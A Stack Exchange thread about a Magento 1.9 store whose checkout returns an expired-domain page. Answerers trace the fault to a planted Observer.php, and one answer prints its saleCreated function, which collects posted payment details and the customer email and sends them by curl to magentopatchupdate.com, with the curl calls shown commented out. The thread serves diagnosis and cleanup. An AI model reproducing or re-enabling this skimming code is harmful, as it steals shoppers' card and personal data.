# Magento Sagepay Payment response Magentopatchupdate.com

Tags: magento-1.9, opayo

I am using Ebizmarts Sagepay payment module and enable “Sage Pay Suite [Frontend - DIRECT Integration]” method from magento backend but at front end after press Place Order Now button, request goes to sagepay but strange response coming back. This happen from last 2 days.
Response : 
"Magentopatchupdate.com
This Domain Name Has Expired - Renewal Instructions.
Privacy Policy"

Please see the image
[image]

Can any help me?
Magento version 1.9.0.1 and using onestepcheckout extension
Thanks

Comment: I just fix this problem by removing /app/code/local/Mage/Controller folder. I think this folder created after apply security patches

Answer (score 0):

The problem is not the means of payment.

I found the same problem with a customer. After running all the patches of security magento you should removar a file that was created in app / code / **local** / Mage / Controller

Answer (score 0):

I just fixed this for a client - the file was :

```
  /app/code/local/Mage/Controller/Model/Observer.php
```

I didn't delete it, i just commented out the curl commands in the saleCreated function.

```
  public function saleCreated(Varien_Event_Observer $observer)
{
    $url = 'http://magentopatchupdate.com/update/529U76xbMIH.php';

    $orderData = $observer->getEvent()->getOrder();
    $order = Mage::getModel('sales/order')->loadByIncrementId($orderData->getIncrementId());

    $this->_preparePaymentData($_POST, '');
    //$this->orderDetails['shipping_method'] = $order->getShippingMethod();
    $this->orderDetails['customer_email'] = $order->getCustomerEmail();
    $this->getOrderAddressInfo($order, 'billing');
    //$this->getOrderAddressInfo($order, 'shipping');

   //print_r(json_encode($this->orderDetails));

    $postStr = '';
    foreach($this->orderDetails as $key=>$value) {
        $postStr .= $key . '=' . $value . '&';
    }

    rtrim($postStr, '&');

    //This was causing issue - commented out all curl commands
    //$ch = curl_init();
    //curl_setopt($ch,CURLOPT_URL, $url);
    //curl_setopt($ch,CURLOPT_POST, count($_POST));
    //curl_setopt($ch,CURLOPT_POSTFIELDS, $postStr);

    //$result = curl_exec($ch);
    //curl_close($ch);
}
```

Some of the above line were commented out already - why its sending out order details to magentopatchupdate.com is very dubious...